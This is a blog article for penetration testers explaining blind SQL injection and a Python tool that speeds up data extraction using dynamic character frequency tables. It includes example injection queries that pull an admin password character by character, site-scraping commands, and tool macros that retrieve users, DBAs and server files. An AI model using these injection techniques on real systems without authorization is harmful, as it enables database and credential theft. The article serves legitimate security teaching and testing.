[Editor's note: In this excellent article, Mark Baggett covers a technique he's implemented in a brand new tool for making blind SQL injection penetration testing and ethical hacking far more efficient using dynamic character frequency tables. The article describes his approach, covers a new tool he's created, and features a video demo. Awesome stuff for a penetration tester's toolbox, Mark! -Ed.]
By Mark Baggett
Look at this DATABASE filled with glamorous merchandise and fabulous prices just waiting to be extracted on WHEEL OF FORTUNE. What, did you hear that differently than I did? How can the wheel of fortune be used to extract data from a database? The player that knows the statistical probability of characters appearing around other characters will win on Wheel of Fortune. The same is true for a penetration tester doing blind SQL injection. Let's take a look at how using the frequency of character pairs can aid in attacks like blind SQL injection. But first, we need to understand blind SQL injection.
Blind SQL Injection
Blind SQL injection attacks inject TRUE/FALSE questions into a database query and measure the results of that query based upon how the server responds. They are especially useful when the vulnerable application will not let us directly see the output of the SQL we inject to the back-end database. On the surface, it may seem a showstopper for penetration testers who can't see the output generated by their queries. But, by asking a large number of TRUE/FALSE questions, we can make the database leak its contents to us. The result is blind SQL injection.
Consider the following queries. "SELECT lastname FROM users WHERE firstname="Mark" and 1=1;". This will return the lastname field in every record in the database where the firstname is Mark. Because "and 1=1" is always true, it does not affect the results of the first part of the query (because, logically "anything AND true" will take on the value of that anything). However, the query "SELECT lastname FROM users WHERE firstname="Mark" and 1=0;" will return no records because "AND 1=0" is always false and thus will match no records in the database (anything AND false is always false).
Using this technique, we can ask the database TRUE/FALSE questions. Instead of injecting a simple question like "is one equal to zero" we can inject questions like "Is the first letter of the query 'SELECT password FROM admins LIMIT 1;' equal to the letter 'a'." To do so, our query looks something like this: SELECT lastname FROM users WHERE firstname="MARK" and (SUBSTRING((SELECT password FROM admins limit 1),1,1)='a');
If the first letter of first admins password starts with the letter 'a' then the query will return the lastname of users in our system whose firstname is "MARK". If the admins password doesn't start with an 'a' then it will return nothing. Even though the original query didn't give us direct access to the admins database and we cannot directly see the results of our injected query we can still ascertain the values in the database by the presence of the string "Orlando" in the response.
Most blind SQL injection tools use a technique similar to this to extract all of the data from the database. They vary in how they choose the letters letter to compare to the substring of the response. For example, some tools will simply brute force the letter. "Is the first letter A? Is it B? Is it C?", and so on. Others will repeatedly cut the character set in half. "Is it less than M? Is it less than F?", etc. Some tools will compare the binary bits in the ASCII value of the letters. But today, no widely used publicly available tools rely on the Wheel of Fortune technique to guess the last letter. I'd like to change that.
Character Frequency Tables
Last year I wrote a simple SQL injection tool that used character frequency tables based on a paper posted to http://www.exploit-db.com/papers/13696/. The paper, written by Dmitry Evteev and Vladimir Vorontsov, talks about using static frequency tables to extract data from SQL Injection attacks and is a very good read. The basic concept is this: if I have just learned that the first character in the name of the database is a "Q", then what is the next letter going to be? Intuitively you probably guessed that the next character would likely be "U". And you would be correct almost all of the time in the English language. There is a 99% chance that a "U" will be the character to follow a "Q" for English text. While not as drastic as the "QU" combination, there are high probabilities associated with most of the other characters. For example there is approximately a 39% chance that the character after a "T" will be an "H" in normal English text. So if we know the first character we can use these probabilities to guess what the next character will be. The technique allowed us to issue fewer requests to a database to extract data from a site vulnerable to SQL Injection. This adds stealth and speed to the pen-tester's bag of tricks. But the use of static character frequency tables has its limitations.
Dynamic Character Frequency Tables
First off, if I think I am querying a field in a database that contains only numbers, then attempting alphabetic characters is a waste of time. Second, many character frequency tables are for generic English text and databases often contain product names, company names, and things other than written text. While the "TH" pair is strongly coupled in text, the word "THE" isn't as frequent inside of databases that don't contain free-form text. While static frequency tables will work, we can be more efficient if our frequency tables were built specifically for the target system and changed dynamically as it learns about the target database. To do this right, I need to start with multiple frequency tables: some with digits, some with alphanumeric characters, and some with all characters just like we use when brute-forcing passwords. I also need a way to have my tables be specific to the target I am engaging and have my tables DYNAMICALLY learn from the information it has already extracted from the database so that it makes the most intelligent guess possible for the next character.
To that end, I developed a Python class to manage character frequency tables and a simple SQL Injection tool to demonstrate the use of the tables. The purpose of the tool is to demonstrate the validity of the attack methodology. It isn't intended, nor does it try, to offer the level of functionality we get from tools like SQLMAP. But perhaps the FreqCounter objects inside my tool might benefit the developers of other tools. I welcome them to incorporate my technique and code in their projects.
The "FreqCounter" class is a highly documented object that is used to build targeted frequency counter tables and dynamically adjust the character frequencies as it learns new words from the database itself. If you run my sqlinjection.py tool with a "-b" option, you are dropped into a Python instance so you can build customized frequency tables for your target.
To use it, first, obtain a text-only version of your target's website that we can use to help tune our initial frequency tables to the target environment. There are several ways to do this, but a simple way using the text-based Lynx browser relies on the following two commands.
$ wget -r http://targetwebsite.com
$ grep -h -R "" * | lynx --stdin --dump --nolist --nostatus --notitle > targetwebsitetext.txt
Next, we start the sqlinjector.py script in "build mode". Then we load one of the prebuilt frequency tables and modify it by having it tally up the characters in our file containing the target's website weighting each character pair 1,000 times to boost them in the exiting table, in effect training our tables according to our website. The steps for doing this are shown in the following screenshot, and are described in detail below:
STEP 1 ) After invoking the Python interpreter to run my sqlinjectory.py tool with the -b option, we create a new object called fq. This fq object contains all the methods needed to manage a frequency character database.
STEP 2) The load() method loads an existing frequency table into the object. In this case we are loading the character frequency table stored in "sqlinjector-normal.freq" file into our object.
STEP 3) Here we tally up the character frequencies in the text document "targetwebsitetext.txt" and count each character pair in the file 1000 times so that they will be more heavily weighted than normal text. With this option, if an A follows an S in the file "targetwebsitetext.txt" it will be counted as though an A followed an S 1000 times.
STEP 4) We save our new targeted character frequency table for use.
The FreqCounter has several other methods that are useful for fine turning your tables. HELP(FreqCounter) will point you in the right direction. Now we are ready to launch our attack using our modified frequency tables. Next we point the sqlinjector.py script at the target URL and configure the required options.
The SQLINJECTOR tool
Here is an example of how we can use these frequency tables with the SQLINJECTOR script.
The -s option allows you to provide a match string that the program will use to identify when a "TRUE" value is returned by the Blind Sql Injection attack. For example, the tools will ask the database, "Is the first letter of your table name = 'Q'?". If it sees the string our command includes after the -s option, it will assume that the answer was yes.
The -v option tells the tool to be verbose in its output. A -vv can also be used to be very verbose. Being very verbose is useful when troubleshooting, as the tool will tell you exactly which URLs it requested.
The -f options tells the tool which character frequency table to use. In this case, we want to use the table we created in our earlier steps. The program assumes the actual file name will be in the format "sqlinjector-<tablename>.freq".
The program will automatically "learn" the character frequencies from table names, column names, and other text element as it is being extracted from the database and tune its frequency tables accordingly. By default, each learned character will be promoted by 5 spaces in its respective table. For example, if, during our attack, the tool sees that the letter "F" follows the letter "Q", then the probability of an "F" will be promoted to 1 point higher than the character that is currently 5 times more likely than the letter F. The learning weight can be changed with the -l (lowercase L not a dash-one) option. So, "-l 30" will cause learned characters to be promoted 30 places in their list and a "-l 0" will turn off learning characters during the attack, essentially using a static table.
The last option is a target URL along with a SQL command to execute on the vulnerable site. It is important to note that my tool does not find SQL injection flaws in the first place. This is a tool for exploiting them by extracting data from a site that is vulnerable to SQL injection. Therefore, you must know where the SQL injection point is prior to using the tool.
In my example, I am injecting a macro called "gettable" into a vulnerable "filter" field on the site http://172.16.124.120/classlist.php?. Sqlinjector.py will execute any select statement that is valid for the target URL, but it also provides a few Macros for your convenience. The SQL statement or macro must be provided between two carrots (^) at the point of injection. The "gettables" macro will extract a copy of all of the user defined tables and column names inside the database schema in a comma-delimited list format, "table-column". The system provides a couple of macros including "getusers", "getfile=/path/file", and "getdba" which can retrieve a list of mysql users, files from the file system, and the database administrators respectively.
Let's take a look at the tool in action. The following videos demonstrate the use of the sqlinjection.py tool and the build mode for the creation of custom frequency tables.
The use of frequency counter tables and heuristics has other potential applications as well. For example, the keyboard autocorrect on our smart-phones could benefit from knowing what the most likely character to follow the last character typed. Keystroke loggers based upon vibration in the smart phones accelerometer, pulses in electrical noise, or vibrations on a pane of glass that only pick up parts of words can use these tables to fill in the missing letters. Perhaps using heuristics combined with character pair frequencies to analyze protocols, we can identify the difference between HTTP and XML as we parse packets. These are all interesting possible applications of this Wheel of Fortune technique that others may already be working on.
By dynamically learning and adjusting the character frequency tables, my tool can extract data in as little as 4 guesses per character. The more structured the data with common names and repeating values, the faster we can extract it. If the data is unstructured, containing random characters (such as hashes in a database), then this technique is equivalent to brute forcing the data. However, most of the information targeted in penetration tests tends to be structured. The technique is very fast and requires fewer requests than conventional blind SQL injection methods in the right circumstances, making it stealthier and significantly faster. I hope you find it useful.
If you would like to play with the sqlinjectory.py tool and use it in your own work, you can check out a copy of the tool with SVN as follows:
$ svn checkout http://freqcounter-sqlinjector.googlecode.com/svn/trunk/ sqlinjector
Shameless Self Promotion
Follow me on twitter using @markbaggett
FREE MacBook Air, when you join me and Ed Skoudis for SANS 560 Network Penetration Testing and Ethical Hacking vLive! Taught across the Internet with Ed and me as your live instructors, this exciting hands-on, in-depth class starts January 10, 2012. We'll meet twice a week over a six-week span teaching you the skills needed to conduct professional penetration tests. Register before November 23, 2011 and enter the discount code 1027_MACAIR when you register to receive an 11-inch MacBook Air, a really cool SANS promotion. More info here: https://www.sans.org/virtual-training/specials.